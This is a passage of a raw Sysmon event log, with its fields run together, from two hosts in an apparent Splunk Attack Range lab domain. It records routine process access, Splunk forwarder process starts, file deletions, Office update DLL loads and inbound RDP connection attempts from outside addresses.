14:55:03.080{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.080{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.080{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.080{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB47-607E-7B0B-00000000BB01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000065003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.080{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB47-607E-7B0B-00000000BB01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000065002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.081{A7A01FEF-EB47-607E-7B0B-00000000BB01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000049702Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:01.741{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55930-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049701Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:01.566{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52974-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049700Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:03.186{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B901D400A3FB4C58C85D19BCEB92B27,SHA256=8E3BCCD64525C8556952130E3F8E786DE27E395195328E8B9C2BB7A771608643,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:04.861{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6416794444FBB4E323B9480E829A6D0A,SHA256=3CB7D05F5EFD32D3BA15BBBC1E83955A8589B35D99E14DE9564B1C4F5DED8E4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:04.705{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=108C050613D041F7A84EE20D560BDA66,SHA256=EB53E7F77C2E8FC11E7DCDF29365175976FABF241E520C47C4320D90379DD5AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049704Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:04.717{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F975CEC75136029AC97B26B8E21D480F,SHA256=5133C954A161429205A2F27BC2F7AFD9FE59F95990AB72CD625335FC0B9FC076,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049703Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:04.248{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3A95E93542F56A7BB71EAC8AA638582,SHA256=3F722CFDF3F3C2F6A4801DF8B17600D96D3D76CAE9152786AD48EEDDF55A69FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000065037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:05.861{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB49-607E-7D0B-00000000BB01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:05.861{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:05.861{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:05.861{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:05.861{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000065032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:05.861{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB49-607E-7D0B-00000000BB01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000065031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:05.861{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB49-607E-7D0B-00000000BB01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000065030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:05.862{A7A01FEF-EB49-607E-7D0B-00000000BB01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000065029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:05.767{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=031B78ABEE81DBD4C9B310A88A6407CD,SHA256=25A07338ECB05DD6FCAFCFE6ACD3A9102CEEE7232DEB6A0A02714210613F2501,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000065028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:55:05.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\root\Client\C2R64.dll2021-04-20 14:55:05.752 11241100x800000000000000065027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:55:05.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\root\Client\AppvIsvSubsystems64.dll2021-04-20 14:55:05.752 354300x800000000000000065026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:04.003{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63965-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000065025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:03.690{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55673-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000049706Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:03.160{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54453-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049705Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:05.280{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB4A5A794495CC501A5A99AF6730F646,SHA256=817C6941CD38DFA2B8C58356EDECA37AAEDDBFB8107148DBB3FB90774A122241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:06.783{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18386CB5C58F5A34E746C14B26095349,SHA256=B4518B5211C1DFDAC213DF9301EEA162CADE1D5FD090616245574AB51A47840A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000065042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:55:06.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\root\Office16\C2R64.dll2021-04-20 14:55:06.689 11241100x800000000000000065041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:55:06.674{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\root\Office16\AppvIsvSubsystems64.dll2021-04-20 14:55:06.674 354300x800000000000000065040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:04.849{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-8560-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000065039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:04.636{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-16751-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000065038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:06.314{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5EF4853CC21F63D9879C298659A51899,SHA256=F3172FC1814FE7D6CBA49BAA1A3B35437E1612517BD8D5356870B031DCA98AF5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049711Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:04.912{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58897-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049710Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:03.841{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52494-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049709Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:03.359{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57409-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049708Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:06.362{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAB25BD962963635A2A501081FC53BF1,SHA256=9A85F4BCCC391BADDF52CA156FCDEBBF261B304873BB684037A41EE8BC3173A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049707Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:06.002{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA6D4E9C7489B74C7A4091CB0666F99E,SHA256=039895CEB5850C7B4A857AB60A8B3EA56D9A5AA913901C5D89ACEAB77D6F6535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04267_.WMFMD5=FF994A6CBE31EB773DEC9F88755AA64C,SHA256=7C4EF7D46FC8D740C9498C8AD9CCE11AF493D004EDBD2953FD71657D1C2BE0DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04235_.WMFMD5=003761EA7F781196A115D9F7AE99FA78,SHA256=13FFF405082974836009BAE068FD36BAACE292984F1C11E35914293909EE8B28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04225_.WMFMD5=4A9DB6E257D793C130C892BDAD13BA1F,SHA256=F4FAEFDDEF0D28C6FF19D5797F2F5CEECC48FDC85C00BC371A6922E6A19FE3FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04206_.WMFMD5=4DD23D28C59FD710B56F55C0E25EA32B,SHA256=4F08E9CC8AFB0AB00EEEC2844CA06626C33DEA102938C0AD27754AF80034CF7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 